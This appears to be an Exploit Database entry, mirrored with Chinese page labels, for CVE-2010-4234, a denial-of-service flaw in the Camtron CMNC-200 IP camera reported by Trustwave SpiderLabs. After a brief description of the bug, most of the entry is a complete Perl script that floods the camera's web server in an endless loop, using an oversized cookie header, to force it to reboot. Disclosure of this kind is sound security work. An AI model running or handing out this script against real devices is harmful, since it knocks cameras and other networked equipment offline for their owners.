Camtron CMNC-200 IP Camera – Denial of Service

• Exploit Database
• 12 阅读

• 作者： Trustwave's SpiderLabs
  日期： 2010-11-13
• 类别：

  • dos
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/15508/

• Finding 5: Camera Denial of Service
  CVE: CVE-2010-4234
  
  The CMNC-200 IP Camera has a built-in web server that
  is vulnerable to denial of service attacks. Sending multiple
  requests in parallel to the web server may cause the camera
  to reboot.
  
  Requests with long cookie header makes the IP camera reboot a few
  seconds faster, however the same can be accomplished with requests
  of any size.
  
  The example code below is able to reboot the IP cameras in
  less than a minute in a local network.
  
  #!/usr/bin/perl
  
  use LWP::UserAgent;
  
  while (1 == 1){
  
  $ua = new LWP::UserAgent;
  $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US;
  rv:1.8.1.6)");
  
  $req = HTTP::Request->new(GET => 'http://192.168.10.100');
  $req->header(Accept =>
  "text/xml,application/xml,application/xhtml+xml,text/html
  ;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5");
  $req->header("Keep-Alive" => 0);
  $req->header(Connection => "close");
  $req->header("If-Modified-Since" => "Mon, 12 Oct 2009
  02:06:34 GMT");
  $req->header(Cookie =>
  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
  my $res = $ua->request($req);
  
  }